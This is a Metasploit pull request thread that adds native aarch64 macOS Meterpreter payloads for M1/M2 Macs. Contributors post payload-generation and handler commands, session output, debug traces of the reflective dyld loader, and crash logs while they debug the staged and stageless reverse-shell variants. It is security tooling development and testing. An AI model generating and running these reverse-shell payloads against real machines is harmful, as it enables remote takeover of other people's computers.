M1ssion Dyld Mettle: Aarch64 Payloads

[usiegl00]

This builds on Back from the dyld by adding the required aarch64 assembly code to enable the OSX loader to run on the m1. This enables the use of native payloads on M1 or M2 devices that do not have Rosetta installed.

Verification steps

See #17050

Compile steps:

# stager
bash -c "cd external/source/shellcode/osx/stager; make clean install"


# template
bash -c "cd external/source/shellcode/osx/template; make clean install"

Modules to test, ensure that you can run chmod +x ./shell; ./shell in a separate tab and that a new session opens, as well as the test suite passing:

## Load test suite against a session example
loadpath test/modules
use test/all
run session=-1


############### arch

### stageless
jobs -K
sessions -K
use osx/aarch64/meterpreter_reverse_tcp
generate -f macho -o shell lhost=127.0.0.1
to_handler

jobs -K
sessions -K
use osx/aarch64/meterpreter_reverse_http
generate -f macho -o shell lhost=127.0.0.1
to_handler

jobs -K
sessions -K
use osx/aarch64/meterpreter_reverse_https
generate -f macho -o shell lhost=127.0.0.1
to_handler

### staged
jobs -K
sessions -K
use osx/aarch64/meterpreter/reverse_tcp
generate -f macho -o shell lhost=127.0.0.1
to_handler

############### intel

### stageless

jobs -K
sessions -K
use osx/x64/meterpreter_reverse_tcp
generate -f macho -o shell lhost=127.0.0.1
to_handler

### staged
jobs -K
sessions -K
use osx/x64/meterpreter/reverse_tcp
generate -f macho -o shell lhost=127.0.0.1
to_handler

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[timwr]

Presumably this needs a corresponding pull request to mettle to support building aarch64? Nice work btw!

[space-r7]

#17050 has been landed, so you should be able to rebase and pull in those changes. This is really great, thanks for adding this!

[jmartin-tech]

rapid7/mettle#237 should contain the required mettle artifacts to move this forward. Using metasploit_payloads-mettle v1.0.23.

[space-r7]

A couple of small suggestions and noted an issue with the stageless payload.

[space-r7]

Just one comment on the new code signature additions. Here's the output from testing the updates:

msf6 payload(osx/aarch64/meterpreter/reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (812819 bytes) to 192.168.157.1
[-] Meterpreter session 3 is not valid and will be closed
[*] 192.168.157.1 - Meterpreter session 3 closed.

msf6 payload(osx/aarch64/meterpreter/reverse_tcp) > use payload/osx/aarch64/meterpreter_reverse_tcp
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > generate -f macho -o /Users/sherbs/Desktop/payload_stageless LHOST=192.168.157.1
[*] Writing 812819 bytes to /Users/sherbs/Desktop/payload_stageless...
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > jobs -K
Stopping all jobs...
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1

[*] Started reverse TCP handler on [192.168.157.1:4444](http://192.168.157.1:4444/)
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > [*] 192.168.157.1 - Meterpreter session 4 closed.  Reason: Died
[*] Meterpreter session 5 opened ([192.168.157.1:4444](http://192.168.157.1:4444/) -> [192.168.157.1:61786](http://192.168.157.1:61786/)) at 2023-03-06 16:52:51 -0600

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: sherbs
meterpreter > sysinfo
Computer     : nostromo.local
OS           : macOS Ventura (macOS 13.2.0)
Architecture : arm64
BuildTuple   : aarch64-apple-darwin
Meterpreter  : aarch64/osx
meterpreter >

The first two attempt is with the staged payload, which appears to send the midstager and stage across, but will report back as closed before establishing a session. The stageless payload achieved a session, which is the last attempt in the output.

msftidy is outputting that modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb, modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb, and modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb have formatting errors in them. You can run rubocop -a on those files to fix the issues, and that should get the linter tests to pass.

[usiegl00]

@space-r7 Is the staged payload crashing every time on your machine? It's crashing about 1/5 times on mine. I am working on a fix, but it's not pretty. :-P

[space-r7]

@space-r7 Is the staged payload crashing every time on your machine? It's crashing about 1/5 times on mine. I am working on a fix, but it's not pretty. :-P

Yea, it's happened for me every time so far

[usiegl00]

@space-r7 Does the most recent commit fix your issue? If not, would you please send me a crash report from Console.app?

[space-r7]

@space-r7 Does the most recent commit fix your issue? If not, would you please send me a crash report from Console.app?

Sorry, I should have worded myself better. It's not that the process is actually crashing for the staged payload, just that once the Sending stage.. message is displayed, Metasploit then outputs that the session is invalid, and then the session is closed. The new changes haven't affected this so far. I'll try to do some debugging to better help with this.

[usiegl00]

Alright, is there any output on the cli running the staged payload like Bus error: 10 or Segmentation Fault: 11?
Would you remove the //#define DEBUG in main.c and run it again to get more verbose output?
What OS / Hardware are you using? I'm on Monterey with an M1.

[space-r7]

Sorry for the delay! Here's my output from executing a staged payload:

sherbs@nostromo -> Desktop ./payload
main!
hello world!
good symbol!
gDyld found, using dual hijack technique.
apis: %lld
config: %i
base: %lld
sdyld: %lld

It appears to hang at the sdyld line. I'm testing this on Ventura 13.2 with an M1.

[usiegl00]

Thanks @space-r7! I've found that the symbol mangling has changed in Ventura. I'm working on a fix.

[usiegl00]

@space-r7 I've just got it working on Ventura 13.3 Beta, going to clean up the code a bit and push my changes.

[space-r7]

Thanks! The payload managed to get much further this time; however, I'm now getting a bus error:

sherbs@nostromo -> Desktop ./payload
zsh: bus error  ./payload
sherbs@nostromo -> Desktop ./payload
main!
hello world!
good symbol!
gDyld found, using dual hijack technique.
apis: %lld
config: %i
base: %lld
sdyld: %lld
Ventura!
Errno: %lld
Buffer: %lld
Analyzing Segments.
vmSpace: %lld
Translated: %s
VMAllocate Ret: %lld
LoadAddress: %lld
Region Ptrs: %lld
usedCount: %lld
allocCount: %lld
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Errno: %i
Addr: %lld
Size: %lld
Perms: %lld
Flags: %lld
FD: %lld
Offset: %lld
Errno: %i
Buffer: %lld
BufferO: %lld
Errno: %i
SegAddress: %lld
Errno: %i
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Errno: %i
Addr: %lld
Size: %lld
Perms: %lld
Flags: %lld
FD: %lld
Offset: %lld
Errno: %i
Buffer: %lld
BufferO: %lld
Errno: %i
SegAddress: %lld
Errno: %i
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Errno: %i
Addr: %lld
Size: %lld
Perms: %lld
Flags: %lld
FD: %lld
Offset: %lld
Errno: %i
Buffer: %lld
BufferO: %lld
Errno: %i
SegAddress: %lld
Errno: %i
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Region vmOffset: %lld
Region perms: %lld
Region isZeroFill: %lld
Region readOnlyData: %lld
Region fileOffset: %lld
Region fileSize: %lld
----
Errno: %i
Addr: %lld
Size: %lld
Perms: %lld
Flags: %lld
FD: %lld
Offset: %lld
Errno: %i
Buffer: %lld
BufferO: %lld
Errno: %i
SegAddress: %lld
Errno: %i
Loaded Size: %lld
Loaded first: %lld
Loaded Capacity: %lld
Apis: %lld
LoadAddress: %lld
JITLMP: %lld
zsh: bus error  ./payload

[usiegl00]

Hi @space-r7, you wouldn't happen to have a crash log in Console.app?

[space-r7]

Yep, here's the message:

Sending event: com.apple.stability.crash {"coalitionName":"com.apple.Terminal","exceptionCodes":"0x0000000000000002, 0x00000001047b44d0(\n    2,\n    4370154704\n)EXC_BAD_ACCESSSIGBUSKERN_PROTECTION_FAILURE at 0x00000001047b44d0","incidentID":"0C94A929-FE0E-4AC0-B231-8BA024F547E3","logwritten":1,"process":"payload_staged.macho","responsibleApp":"Terminal","terminationReasonExceptionCode":"0xa","terminationReasonNamespace":"SIGNAL"}

And the full crash report:

sherbs@nostromo -> Desktop cat /Users/sherbs/Library/Logs/DiagnosticReports/payload_staged.macho-2023-03-21-140831.ips
{"app_name":"payload_staged.macho","timestamp":"2023-03-21 14:08:31.00 -0500","app_version":"","slice_uuid":"66f0bdc4-e561-3f11-a616-f4817bcbbdd3","build_version":"","platform":1,"share_with_app_devs":0,"is_first_party":1,"bug_type":"309","os_version":"macOS 13.2 (22D49)","roots_installed":0,"incident_id":"0C94A929-FE0E-4AC0-B231-8BA024F547E3","name":"payload_staged.macho"}
{
  "uptime" : 200000,
  "procRole" : "Unspecified",
  "version" : 2,
  "userID" : 501,
  "deployVersion" : 210,
  "modelCode" : "MacBookPro17,1",
  "coalitionID" : 1904,
  "osVersion" : {
    "train" : "macOS 13.2",
    "build" : "22D49",
    "releaseType" : "User"
  },
  "captureTime" : "2023-03-21 14:08:31.3689 -0500",
  "incident" : "0C94A929-FE0E-4AC0-B231-8BA024F547E3",
  "pid" : 80546,
  "translated" : false,
  "cpuType" : "ARM-64",
  "roots_installed" : 0,
  "bug_type" : "309",
  "procLaunch" : "2023-03-21 14:08:30.8416 -0500",
  "procStartAbsTime" : 4820963989912,
  "procExitAbsTime" : 4820976635370,
  "procName" : "payload_staged.macho",
  "procPath" : "\/Users\/USER\/Desktop\/payload_staged.macho",
  "parentProc" : "zsh",
  "parentPid" : 26216,
  "coalitionName" : "com.apple.Terminal",
  "crashReporterKey" : "AD9892D9-18C8-AF3E-C8D9-D6D0A9CCB814",
  "responsiblePid" : 2309,
  "responsibleProc" : "Terminal",
  "wakeTime" : 357,
  "sleepWakeUUID" : "378FF9AA-A682-439F-AFA1-74D5F82A8645",
  "sip" : "enabled",
  "vmRegionInfo" : "0x1047b44d0 is in 0x1047b4000-0x1047f4000;  bytes after start: 1232  bytes before end: 260911\n      REGION TYPE                    START - END         [ VSIZE] PRT\/MAX SHRMOD  REGION DETAIL\n      __LINKEDIT                  1047b0000-1047b4000    [   16K] r--\/r-- SM=COW  ..._staged.macho\n--->  dyld private memory         1047b4000-1047f4000    [  256K] r--\/rwx SM=PRV  \n      VM_ALLOCATE                 1047f4000-1047f8000    [   16K] r-x\/rwx SM=PRV  ",
  "exception" : {"codes":"0x0000000000000002, 0x00000001047b44d0","rawCodes":[2,4370154704],"type":"EXC_BAD_ACCESS","signal":"SIGBUS","subtype":"KERN_PROTECTION_FAILURE at 0x00000001047b44d0"},
  "termination" : {"flags":0,"code":10,"namespace":"SIGNAL","indicator":"Bus error: 10","byProc":"exc handler","byPid":80546},
  "vmregioninfo" : "0x1047b44d0 is in 0x1047b4000-0x1047f4000;  bytes after start: 1232  bytes before end: 260911\n      REGION TYPE                    START - END         [ VSIZE] PRT\/MAX SHRMOD  REGION DETAIL\n      __LINKEDIT                  1047b0000-1047b4000    [   16K] r--\/r-- SM=COW  ..._staged.macho\n--->  dyld private memory         1047b4000-1047f4000    [  256K] r--\/rwx SM=PRV  \n      VM_ALLOCATE                 1047f4000-1047f8000    [   16K] r-x\/rwx SM=PRV  ",
  "extMods" : {"caller":{"thread_create":0,"thread_set_state":0,"task_for_pid":0},"system":{"thread_create":0,"thread_set_state":88,"task_for_pid":10},"targeted":{"thread_create":0,"thread_set_state":0,"task_for_pid":0},"warnings":0},
  "faultingThread" : 0,
  "threads" : [{"triggered":true,"id":4324065,"threadState":{"x":[{"value":255},{"value":4371954168},{"value":0},{"value":4371954008},{"value":4371954392},{"value":65536},{"value":14942208},{"value":4371953999},{"value":4370154704},{"value":4370176544},{"value":0},{"value":4371954225},{"value":4371954185},{"value":3},{"value":5},{"value":18446744073709551615},{"value":8820469072,"symbolLocation":72,"symbol":"vtable for lsl::PersistentAllocator"},{"value":1461699562878905680,"symbolLocation":1461699554058436680,"symbol":"vtable for lsl::PersistentAllocator"},{"value":0},{"value":4370153472},{"value":4371954208},{"value":16},{"value":18446744073709551600},{"value":4371954186},{"value":240},{"value":4370154576},{"value":16},{"value":15},{"value":224}],"flavor":"ARM_THREAD_STATE64","lr":{"value":7257480984},"cpsr":{"value":2147487744},"fp":{"value":4371954368},"sp":{"value":4371954112},"esr":{"value":2449473615,"description":"(Data Abort) byte write Permission fault"},"pc":{"value":7257481076,"matchesCrashFrame":1},"far":{"value":4370154704}},"queue":"com.apple.main-thread","frames":[{"imageOffset":196468,"symbol":"lsl::PersistentAllocator::allocate_buffer(unsigned long, unsigned long, unsigned long, lsl::Allocator**)","symbolLocation":308,"imageIndex":0},{"imageOffset":196376,"symbol":"lsl::PersistentAllocator::allocate_buffer(unsigned long, unsigned long, unsigned long, lsl::Allocator**)","symbolLocation":216,"imageIndex":0},{"imageOffset":192992,"symbol":"lsl::Allocator::aligned_alloc(unsigned long, unsigned long)","symbolLocation":180,"imageIndex":0},{"imageOffset":144456,"symbol":"dyld4::JustInTimeLoader::make(dyld4::RuntimeState&, dyld3::MachOFile const*, char const*, dyld4::FileID const&, unsigned long long, bool, bool, bool, unsigned short, mach_o::Layout const*)","symbolLocation":156,"imageIndex":0},{"imageOffset":4370454392,"imageIndex":1},{"imageOffset":24144,"symbol":"start","symbolLocation":2544,"imageIndex":0}]}],
  "usedImages" : [
  {
    "source" : "P",
    "arch" : "arm64e",
    "base" : 7257284608,
    "size" : 568228,
    "uuid" : "fe8a9d9e-f65d-34ca-942c-175b99c0601b",
    "path" : "\/usr\/lib\/dyld",
    "name" : "dyld"
  },
  {
    "size" : 0,
    "source" : "A",
    "base" : 0,
    "uuid" : "00000000-0000-0000-0000-000000000000"
  }
],
  "sharedCache" : {
  "base" : 7256637440,
  "size" : 3447406592,
  "uuid" : "3366b98c-6b8a-3546-8233-dc167320439f"
},
  "vmSummary" : "ReadOnly portion of Libraries: Total=772.8M resident=0K(0%) swapped_out_or_unallocated=772.8M(100%)\nWritable regions: Total=530.3M written=0K(0%) resident=0K(0%) swapped_out=0K(0%) unallocated=530.3M(100%)\n\n                                VIRTUAL   REGION \nREGION TYPE                        SIZE    COUNT (non-coalesced) \n===========                     =======  ======= \nKernel Alloc Once                   32K        1 \nMALLOC                           137.2M       11 \nMALLOC guard page                   96K        5 \nMALLOC_NANO (reserved)           384.0M        1         reserved VM address space (unallocated)\nStack                             8176K        1 \nStack Guard                       56.0M        1 \nVM_ALLOCATE                       1952K        9 \nVM_ALLOCATE (reserved)              48K        1         reserved VM address space (unallocated)\n__AUTH                              46K       11 \n__AUTH_CONST                        70K       38 \n__DATA                             191K       37 \n__DATA_CONST                       188K       40 \n__DATA_DIRTY                        78K       22 \n__LINKEDIT                       767.8M        2 \n__OBJC_CONST                        11K        5 \n__OBJC_RO                         65.5M        1 \n__OBJC_RW                         1988K        1 \n__TEXT                            5120K       42 \ndyld private memory                256K        1 \nshared memory                       16K        1 \n===========                     =======  ======= \nTOTAL                              1.4G      231 \nTOTAL, minus reserved VM space     1.0G      231 \n",
  "legacyInfo" : {
  "threadTriggered" : {
    "queue" : "com.apple.main-thread"
  }
},
  "trialInfo" : {
  "rollouts" : [
    {
      "rolloutId" : "5fb4245a1bbfe8005e33a1e1",
      "factorPackIds" : {

      },
      "deploymentId" : 240000021
    },
    {
      "rolloutId" : "60f8ddccefea4203d95cbeef",
      "factorPackIds" : {

      },
      "deploymentId" : 240000025
    }
  ],
  "experiments" : [

  ]
}
}

[usiegl00]

Thanks! It looks like calling lsl::Allocator::malloc is going to crash. I'll have to replicate the function with vm_allocate instead...

[Ishaanahuja7]

Any update on this? @usiegl00 @space-r7

[usiegl00]

Any update on this? @usiegl00 @space-r7

Sorry, just had some personal stuff to deal with last month. I'll be continuing to work on this soon.

[adfoster-r7]

Looks like this needs a rebase and rubocop run on the files 👍

[usiegl00]

@adfoster-r7 Sonoma previewed recently, so I'm going to be working on it.

[Ishaanahuja7]

@space-r7 Please approve and merge

[adfoster-r7]

To the tester:

• We should have access to test hardware on our side
• It looks like a few other commits are coming along with this which we should quickly verify as working as well, i.e. 1.0.20 to the version on this PR. It might be easier to put up a separate PR for this version bump in isolation
• Looks like we'll want to recompile the payloads ourselves too to verify the bytes align

[adfoster-r7]

Suggested change

[adfoster-r7]

🟢 Stageless osx/aarch64/meterpreter_reverse_tcp works:

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > 
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(65536 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1
[*] Meterpreter session 8 opened (127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1 -C getuid
[*] Running 'getuid' on meterpreter session 8 (127.0.0.1)
Server username: jenkins

🔴 Hitting issues with the osx/aarch64/meterpreter/reverse_tcp payload

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > setg sessiontlvlogging true
sessiontlvlogging => true
msf6 payload(osx/aarch64/meterpreter/reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(49152 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1

SEND: #<Rex::Post::Meterpreter::Packet type=Request         tlvs=[
  #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID      meta=INT        value=16 command=core_negotiate_tlv_encryption>
  #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID      meta=STRING     value="15140495648546938480501506891891">
  #<Rex::Post::Meterpreter::Tlv type=RSA_PUB_KEY     meta=RAW        value="0\x82\x01\"0\r\x06\t*\x86H\x86\xF7\r\x01\x01\x01\ ...">
]>

msf6 payload(osx/aarch64/meterpreter/reverse_tcp) >
[-] Meterpreter session 4 is not valid and will be closed
[*] 127.0.0.1 - Meterpreter session 4 closed.

Stager output:

% ./shell
zsh: segmentation fault  ./shell

Steps leading up to the failure

(lldb) 
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x000000010020c0ec
->  0x10020c0ec: add    x0, x0, #0x20, lsl #12    ; =0x20000 
    0x10020c0f0: mov    sp, x0
    0x10020c0f4: mov    x0, x13
    0x10020c0f8: blr    x15
Target 0: (shell) stopped.
(lldb) 
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x000000010020c0f0
->  0x10020c0f0: mov    sp, x0
    0x10020c0f4: mov    x0, x13
    0x10020c0f8: blr    x15
    0x10020c0fc: mov    x0, #0x0
Target 0: (shell) stopped.
(lldb) 
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x000000010020c0f4
->  0x10020c0f4: mov    x0, x13
    0x10020c0f8: blr    x15
    0x10020c0fc: mov    x0, #0x0
    0x10020c100: ldr    x16, #0x40
Target 0: (shell) stopped.
(lldb) 
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step over
    frame #0: 0x000000010020c0f8
->  0x10020c0f8: blr    x15
    0x10020c0fc: mov    x0, #0x0
    0x10020c100: ldr    x16, #0x40
    0x10020c104: svc    #0
Target 0: (shell) stopped.
(lldb) reg read
General Purpose Registers:
        x0 = 0x0000000000000003
        x1 = 0x0000000000000000
        x2 = 0x0000000000000003
        x3 = 0x0000000000001002
        x4 = 0x0000000000000000
        x5 = 0x0000000000000000
        x6 = 0x0000000000000000
        x7 = 0x0000000000000000
        x8 = 0x0000000100208000
        x9 = 0x0000000000000002
       x10 = 0x00000000000c6713
       x11 = 0x0000000100220000
       x12 = 0x0000000100220000
       x13 = 0x0000000000000003
       x14 = 0x0000000000001f40
       x15 = 0x0000000100211dd4
       x16 = 0x00000000020000c5
       x17 = 0x00000001fbc91e40  (void *)0x00000001a1b8b0d0: _platform_memmove
       x18 = 0x0000000000000000
       x19 = 0x00000001000c4060
       x20 = 0x0000000100003ef8  shell`main
       x21 = 0x0000000100070070  dyld`dyld4::sConfigBuffer
       x22 = 0x0000000000000000
       x23 = 0x0000000000000000
       x24 = 0x0000000000000000
       x25 = 0x0000000000000000
       x26 = 0x0000000000000000
       x27 = 0x0000000000000000
       x28 = 0x0000000000000000
        fp = 0x000000016fdff1b0
        lr = 0x0000000100003f7c  shell`main + 132
        sp = 0x0000000100420000
        pc = 0x000000010020c0f8
      cpsr = 0x00001000

(lldb) step
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
    frame #0: 0x0000000100211dd4
->  0x100211dd4: ldr    x2, [x9, #0x280]
    0x100211dd8: add    x3, sp, #0x1c8
    0x100211ddc: mov    w9, #0x1
    0x100211de0: and    w4, w9, #0x1
Target 0: (shell) stopped.
(lldb) next
Process 1895 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x282)
    frame #0: 0x0000000100211dd4
->  0x100211dd4: ldr    x2, [x9, #0x280]
    0x100211dd8: add    x3, sp, #0x1c8
    0x100211ddc: mov    w9, #0x1
    0x100211de0: and    w4, w9, #0x1
Target 0: (shell) stopped.

I believe it's dying on the call to osx main in x15; I'm testing on an M1 machine running in UTM with Montery 12.6. Unfortunately I'm running with a slightly janky setup currently which makes it awkward to debug further - if there's not enough details to fix the crash - I'll try to get access to a different setup/get more details 👍

[usiegl00]

Yes, the crash was due to the recvfrom syscall reading too many bytes (0x1000). I'll go back to the exact 328 stager size.

[adfoster-r7]

@usiegl00 Thanks! I've ran this through on 11.7.8 on AWS, and 12.6 on M1 in UTM. I've sent a PR for updating the Makefile for the template setup and compiling the binaries. I'll do a final pass on 13.x tomorrow

[adfoster-r7]

Finished testing with Ventura 13.4.1 on AWS now too, all looks good to me! 🥳

[adfoster-r7]

Release Notes

Adds new support for multiple OSX AArch64 payloads: osx/aarch64/meterpreter/reverse_tcp, osx/aarch64/meterpreter_reverse_https, osx/aarch64/meterpreter_reverse_tcp, osx/aarch64/meterpreter_reverse_http. This enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

[adfoster-r7]

Thanks for the awesome work @usiegl00 🎉